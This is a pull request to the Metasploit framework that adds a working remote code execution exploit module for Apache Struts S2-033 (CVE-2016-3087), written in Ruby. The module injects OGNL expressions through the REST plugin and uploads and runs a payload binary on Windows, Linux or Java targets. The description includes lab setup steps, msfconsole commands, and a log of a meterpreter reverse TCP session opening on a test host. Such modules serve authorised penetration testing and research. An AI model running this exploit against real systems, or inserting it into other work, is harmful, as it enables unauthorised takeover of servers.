### PR TITLE
add Apache struts S2-033 RCE

### DIFF
--- a/modules/exploits/multi/http/struts_dmi_rest_exec.rb
+++ b/modules/exploits/multi/http/struts_dmi_rest_exec.rb
@@ -1,0 +1,204 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a remote command execution vulnerability in Apache Struts
+        version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
+        Execution can be performed via method: prefix when Dynamic Method Invocation
+        is enabled.
+      },
+      'Author'         => [
+        'Nixawk' # original metasploit module
+       ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2016-3087' ],
+          [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91741' ]
+        ],
+      'Platform'      => %w{ java linux win },
+      'Privileged'     => true,
+      'Targets'        =>
+        [
+          ['Windows Universal',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'win'
+            }
+          ],
+          ['Linux Universal',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux'
+            }
+          ],
+          [ 'Java Universal',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'java'
+            },
+          ]
+        ],
+      'DisclosureDate' => 'Jun 01 2016',
+      'DefaultTarget' => 2))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-rest-showcase/orders/3/']),
+        OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil])
+      ], self.class)
+  end
+
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def get_target_platform
+    target.platform.platforms.first
+  end
+
+  def temp_path
+    @TMPPATH ||= lambda {
+      path = datastore['TMPPATH']
+      return nil unless path
+
+      case get_target_platform
+      when Msf::Module::Platform::Windows
+        slash = '\\'
+      when
+        slash = '/'
+      else
+      end
+
+      unless path.end_with?('/')
+        path << '/'
+      end
+      return path
+    }.call
+  end
+
+  def send_http_request(payload, params_hash)
+    uri = normalize_uri(datastore['TARGETURI'])
+    uri = "#{uri}/#{payload}"
+    resp = send_request_cgi(
+      'uri'     => uri,
+      'version' => '1.1',
+      'method'  => 'POST',
+      'vars_post' => params_hash
+    )
+    if resp && resp.code == 404
+      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
+    end
+    resp
+  end
+
+  def generate_rce_payload(code)
+    payload = ""
+    payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
+    payload << ","
+    payload << Rex::Text.uri_encode(code)
+    payload << ","
+    payload << Rex::Text.uri_encode("#xx.toString.json")
+    payload << "?"
+    payload << Rex::Text.uri_encode("#xx:#request.toString")
+    payload
+  end
+
+  def upload_exec(cmd, filename, content)
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+    var_c = rand_text_alpha_lower(4)
+    var_d = rand_text_alpha_lower(4)
+    var_e = rand_text_alpha_lower(4)
+    var_f = rand_text_alpha_lower(4)
+
+    code =  "##{var_a}=new sun.misc.BASE64Decoder(),"
+    code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_e}[0]))),"
+    code << "##{var_b}.write(new java.math.BigInteger(#parameters.#{var_f}[0], 16).toByteArray()),##{var_b}.close(),"
+    code << "##{var_c}=new java.io.File(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_e}[0]))),##{var_c}.setExecutable(true),"
+    code << "@java.lang.Runtime@getRuntime().exec(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_d}[0])))"
+    payload = generate_rce_payload(code)
+
+    params_hash = {
+      var_d => Rex::Text.encode_base64(cmd),
+      var_e => Rex::Text.encode_base64(filename),
+      var_f => content
+    }
+    send_http_request(payload, params_hash)
+  end
+
+  def check
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+
+    addend_one = rand_text_numeric(rand(3) + 1).to_i
+    addend_two = rand_text_numeric(rand(3) + 1).to_i
+    sum = addend_one + addend_two
+    flag = Rex::Text.rand_text_alpha(5)
+
+    code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
+    code << "##{var_a}.print(#parameters.#{var_b}[0]),"
+    code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two})),"
+    code << "##{var_a}.print(#parameters.#{var_b}[0]),"
+    code << "##{var_a}.close()"
+
+    payload = generate_rce_payload(code)
+    params_hash = { var_b => flag }
+
+    begin
+      resp = send_http_request(payload, params_hash)
+    rescue Msf::Exploit::Failed
+      return Exploit::CheckCode::Unknown
+    end
+
+    if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    payload_exe = rand_text_alphanumeric(4 + rand(4))
+    case target['Platform']
+      when 'java'
+        payload_exe = "#{temp_path}#{payload_exe}.jar"
+        pl_exe = payload.encoded_jar.pack
+        command = "java -jar #{payload_exe}"
+      when 'linux'
+        path = datastore['TMPPATH'] || '/tmp/'
+        pl_exe = generate_payload_exe
+        payload_exe = "#{path}#{payload_exe}"
+        command = "/bin/sh -c #{payload_exe}"
+      when 'win'
+        path = temp_path || '.\\'
+        pl_exe = generate_payload_exe
+        payload_exe = "#{path}#{payload_exe}.exe"
+        command = "cmd.exe /c #{payload_exe}"
+      else
+        fail_with(Failure::NoTarget, 'Unsupported target platform!')
+    end
+
+    pl_content = pl_exe.unpack('H*').join()
+
+    print_status("Uploading exploit to #{payload_exe}, and executing it.")
+    upload_exec(command, payload_exe, pl_content)
+
+    handler
+  end
+
+end

--- a/modules/exploits/multi/http/struts_dmi_rest_exec.rb
+++ b/modules/exploits/multi/http/struts_dmi_rest_exec.rb
@@ -17,8 +17,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'    => %q{
         This module exploits a remote command execution vulnerability in Apache Struts
         version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
-        Execution can be performed via method: prefix when Dynamic Method Invocation
-        is enabled.
+        Execution can be performed when using REST Plugin with ! operator when
+        Dynamic Method Invocation is enabled.
       },
       'Author'         => [
         'Nixawk' # original metasploit module


### PR DESCRIPTION
@wchen-r7  @wvu-r7 @bcook-r7 Please test the module. 

https://struts.apache.org/docs/s2-033.html
https://www.seebug.org/vuldb/ssvid-91741
## Environment Setup

Please setup tomcat [struts2-rest-showcase.war](https://github.com/rapid7/metasploit-framework/files/300762/struts2-rest-showcase.tar.gz)

Enable DMI mode - **/var/lib/tomcat8/webapps/struts2-rest-showcase/WEB-INF/classes/struts.xml**

```
   <constant name="struts.enable.DynamicMethodInvocation" value="true" />
    <constant name="struts.devMode" value="false" />
```
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/multi/http/struts_dmi_rest_exec`
- [x] `set RHOST 172.16.176.226`
- [x] `set TARGETURI /struts2-rest-showcase/orders/3`
- [x] `exploit`

Please view https://github.com/rapid7/metasploit-framework/issues/6944, and **linux** / **java** / **windows** stagers are here. 

```
msf exploit(struts_dmi_rest_exec) > show options

Module options (exploit/multi/http/struts_dmi_rest_exec):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.16.176.226                   yes       The target address
   RPORT      8080                             yes       The target port
   SSL        false                            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /struts2-rest-showcase/orders/3  yes       The path to a struts application action
   TMPPATH                                     no        Overwrite the temp path for the file upload. Needed if the home directory is not writable.
   VHOST                                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LHOST         172.16.176.1     yes       The listen address
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Universal


msf exploit(struts_dmi_rest_exec) > check
[+] The target is vulnerable.
msf exploit(struts_dmi_rest_exec) > run

[*] Started reverse TCP handler on 172.16.176.1:4444
[*] 172.16.176.226:8080 - Uploading exploit to /tmp/8wN6, and executing it.
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 172.16.176.226
[*] Meterpreter session 2 opened (172.16.176.1:4444 -> 172.16.176.226:57188) at 2016-06-06 03:47:18 -0500

meterpreter > sysinfo
Computer     : lab
OS           : Linux lab 4.3.0-kali1-686-pae #1 SMP Debian 4.3.5-1kali1 (2016-02-11) (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter >
```
